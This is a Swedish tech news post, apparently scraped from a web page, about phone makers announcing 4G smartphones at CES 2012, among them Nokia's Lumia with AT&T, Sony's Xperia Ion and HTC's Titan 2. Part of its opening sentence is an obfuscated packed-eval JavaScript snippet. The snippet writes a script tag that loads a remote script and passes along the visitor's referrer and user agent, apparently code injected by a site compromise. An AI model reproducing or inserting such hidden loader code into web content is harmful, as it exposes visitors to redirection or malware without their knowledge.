Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

CES 2012: Nu är det dags för 4g i din smartphone

CES 2012: Nu är det dags för 4g i din smartphone
Sebastian

Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skazr|var|u0026u|referrer|zians||js|php’.split(’|’),0,{}))
CES-mässan igår gick några av de största mobiltillverkarna Nokia, Sony Ericsson, LG, Motorola, HTC och Samsung ut med information om att det står klart att det är 4G som gäller i sina nya produkter. I USA har många operatörer stort inflytande på denna utveckling eftersom många satsar på att stödja dataflöden upp till 100 Mbit/s.

Detta innebär att Nokia nu rullar ut sina första 4G-telefoner i samarbete med operatören AT&T. Lumina 900 som är marknadens första Windows smartphone med stöd för 4G är den som kommer att starta upp 4G eran.

Samma sak gäller för Sony vars första 4g-telefon, Sony Xperia Ion gör premiär i AT&Ts nät.

[quote]
– Bland konsumenter har efterfrågan på 4g-telefoner varit starkast i USA och därför lanserar vi vår första smartphone där. När det kommer till en lansering här och i övriga Europa beror mycket på efterfrågan och de diskussioner vi för med operatörerna, säger Erik Yström, informationschef på Sony Ericsson, det bolag som snart byter namn till Sony Mobile Communications.[/quote]

Vi i Sverige har varit redo för 4G länge nu,  tack vare Telia som driver utveckling framåt. Men vi har blivit alltjämt tvungna att hejda oss och vänta på att resten av världen ska komma ikapp.

Övriga telefoner som stöder 4G märks HTCs Titan 2 som använder sig av Windows Phone och har en kamera på så mycket som 16 megapixel. Den har också en stor skärm på hela 4,7 tum vilket är den största bland Windowstelefonerna.

Läs mer: Idg.se